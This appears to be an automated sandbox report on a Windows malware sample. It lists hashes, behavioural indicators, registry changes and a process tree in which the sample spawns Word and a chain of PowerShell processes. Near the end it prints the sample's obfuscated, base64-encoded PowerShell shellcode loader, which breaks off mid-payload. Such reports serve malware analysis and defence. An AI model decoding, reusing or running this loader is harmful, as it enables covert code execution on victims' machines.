092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c

Analysis

max time kernel
147s
max time network
167s
platform
windows7_x64
resource
win7-20220414-en
submitted
30-05-2022 19:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe
Size

960KB
MD5

9c7dba56e25b6fddf1cba95c66f05e60
SHA1

080c0983e931f8d577b0eb7886719737e6a9363c
SHA256

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c
SHA512

23fc37f30bd52f5b73595b0c856b6fafb88e57dbe8a9e584199a27c245af5688c92f4448199928a4487875dd08066bd481f0670331418dabc5983c763a2f7fdb

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exe

flow pid process

2 548 powershell.exe
2 548 powershell.exe
2 548 powershell.exe
2 548 powershell.exe
2 548 powershell.exe
2 548 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

flow	pid	process
2	548	powershell.exe
2	548	powershell.exe
2	548	powershell.exe
2	548	powershell.exe
2	548	powershell.exe
2	548	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1548 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2000 powershell.exe
828 powershell.exe
548 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2000 powershell.exe
Token: SeDebugPrivilege 828 powershell.exe
Token: SeDebugPrivilege 548 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1548 WINWORD.EXE
1548 WINWORD.EXE

pid	process
1548	WINWORD.EXE

pid	process
2000	powershell.exe
828	powershell.exe
548	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe

pid	process
1548	WINWORD.EXE
1548	WINWORD.EXE

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.execmd.exepowershell.exepowershell.exepowershell.execsc.exeWINWORD.EXE

description	pid	process	target process
PID 1304 wrote to memory of 1548	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	WINWORD.EXE
PID 1304 wrote to memory of 1548	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	WINWORD.EXE
PID 1304 wrote to memory of 1548	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	WINWORD.EXE
PID 1304 wrote to memory of 1548	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	WINWORD.EXE
PID 1304 wrote to memory of 1728	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	cmd.exe
PID 1304 wrote to memory of 1728	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	cmd.exe
PID 1304 wrote to memory of 1728	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	cmd.exe
PID 1304 wrote to memory of 1728	1304	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	cmd.exe
PID 1728 wrote to memory of 2000	1728	cmd.exe	powershell.exe
PID 1728 wrote to memory of 2000	1728	cmd.exe	powershell.exe
PID 1728 wrote to memory of 2000	1728	cmd.exe	powershell.exe
PID 1728 wrote to memory of 2000	1728	cmd.exe	powershell.exe
PID 2000 wrote to memory of 828	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 828	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 828	2000	powershell.exe	powershell.exe
PID 2000 wrote to memory of 828	2000	powershell.exe	powershell.exe
PID 828 wrote to memory of 548	828	powershell.exe	powershell.exe
PID 828 wrote to memory of 548	828	powershell.exe	powershell.exe
PID 828 wrote to memory of 548	828	powershell.exe	powershell.exe
PID 828 wrote to memory of 548	828	powershell.exe	powershell.exe
PID 548 wrote to memory of 672	548	powershell.exe	csc.exe
PID 548 wrote to memory of 672	548	powershell.exe	csc.exe
PID 548 wrote to memory of 672	548	powershell.exe	csc.exe
PID 548 wrote to memory of 672	548	powershell.exe	csc.exe
PID 672 wrote to memory of 2044	672	csc.exe	cvtres.exe
PID 672 wrote to memory of 2044	672	csc.exe	cvtres.exe
PID 672 wrote to memory of 2044	672	csc.exe	cvtres.exe
PID 672 wrote to memory of 2044	672	csc.exe	cvtres.exe
PID 1548 wrote to memory of 1620	1548	WINWORD.EXE	splwow64.exe
PID 1548 wrote to memory of 1620	1548	WINWORD.EXE	splwow64.exe
PID 1548 wrote to memory of 1620	1548	WINWORD.EXE	splwow64.exe
PID 1548 wrote to memory of 1620	1548	WINWORD.EXE	splwow64.exe

C:\Users\Admin\AppData\Local\Temp\092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe
"C:\Users\Admin\AppData\Local\Temp\092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1304

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\kasp.docx"
2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
3⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\word.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lh -;sv p ec;sv qKC ((gv lh).value.toString()+(gv p).value.toString());powershell (gv qKC).value.toString() 'JABUAFQATQAgAD0AIAAnACQAdwBEAFgAeQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AEQAWAB5ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADEALAAwAHgAYgBhACwAMAB4ADQAZQAsADAAeABlADMALAAwAHgAZQA2ACwAMAB4ADgAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADUAYQAsADAAeAAwADEALAAwAHgAMQAzACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4AGQAYwAsADAAeAA4ADYALAAwAHgANABhACwAMAB4ADIAOAAsADAAeAA1ADQALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGUANwAsADAAeAAyAGIALAAwAHgANQA4ACwAMAB4ADQAMAAsADAAeABhADUALAAwAHgAYwA3ACwAMAB4ADEAMwAsADAAeAAwADQALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA1ADEALAAwAHgAOAAxACwAMAB4ADUAMQAsADAAeABkADUALAAwAHgAZABjACwAMAB4AGYANwAsADAAeAA1AGMALAAwAHgAZQA2ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgAZgBmACwAMAB4ADYANAAsADAAeAA4AGMALAAwAHgAMQA4ACwAMAB4ADIAMAAsADAAeAA1ADUALAAwAHgANQBmACwAMAB4ADYAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADgAMgAsADAAeAA5AGMALAAwAHgANwAzACwAMAB4ADQAYgAsADAAeABjADgALAAwAHgAMwAzACwAMAB4ADYANAAsADAAeABmADgALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAAwAGYALAAwAHgAYgAyACwAMAB4ADAAOQAsADAAeAA4ADgALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAAyAGIALAAwAHgAYgA5ACwAMAB4AGEAMgAsADAAeAAxADkALAAwAHgANwAyACwAMAB4ADEAOQAsADAAeAA0ADQALAAwAHgAYwBlACwAMAB4ADAAZQAsADAAeAAxADAALAAwAHgANQBlACwAMAB4ADEAMwAsADAAeAAyAGEALAAwAHgAZQBhACwAMAB4AGQANQAsADAAeABlADcALAAwAHgAYwAwACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgAMwA2ACwAMAB4ADIAOAAsADAAeAA0ADEALAAwAHgANwBlACwAMAB4AGYANwAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADQANgAsADAAeAAzAGYALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeABiAGUALAAwAHgAMwBjACwAMAB4AGIAOQAsADAAeABlADkALAAwAHgAMAA0ACwAMAB4ADMAZgAsADAAeAA2ADUALAAwAHgANwBmACwAMAB4ADkAZgAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADIANwAsADAAeAA3AGIALAAwAHgAMQA2ACwAMAB4ADIAMgAsADAAeABiADEALAAwAHgAMAA4ACwAMAB4ADEANAAsADAAeAA4AGYALAAwAHgAYgA1ACwAMAB4ADUANwAsADAAeAAzADgALAAwAHgAMABlACwAMAB4ADEAOQAsADAAeABlAGMALAAwAHgANAA0ACwAMAB4ADkAYgAsADAAeAA5AGMALAAwAHgAMgAzACwAMAB4AGMAZAAsADAAeABkAGYALAAwAHgAYgBhACwAMAB4AGUANwAsADAAeAA5ADYALAAwAHgAOAA0ACwAMAB4AGEAMwAsADAAeABiAGUALAAwAHgANwAyACwAMAB4ADYAYQAsADAAeABkAGIALAAwAHgAYQAxACwAMAB4AGQAZAAsADAAeABkADMALAAwAHgANwA5ACwAMAB4AGEAOQAsADAAeABmADMALAAwAHgAMAAwACwAMAB4AGYAMAAsADAAeABmADAALAAwAHgAOQBiACwAMAB4AGUANQAsADAAeAAzADkALAAwAHgAMABiACwAMAB4ADUAYgAsADAAeAA2ADIALAAwAHgANAA5ACwAMAB4ADcAOAAsADAAeAA2ADkALAAwAHgAMgBkACwAMAB4AGUAMQAsADAAeAAxADYALAAwAHgAYwAxACwAMAB4AGEANgAsADAAeAAy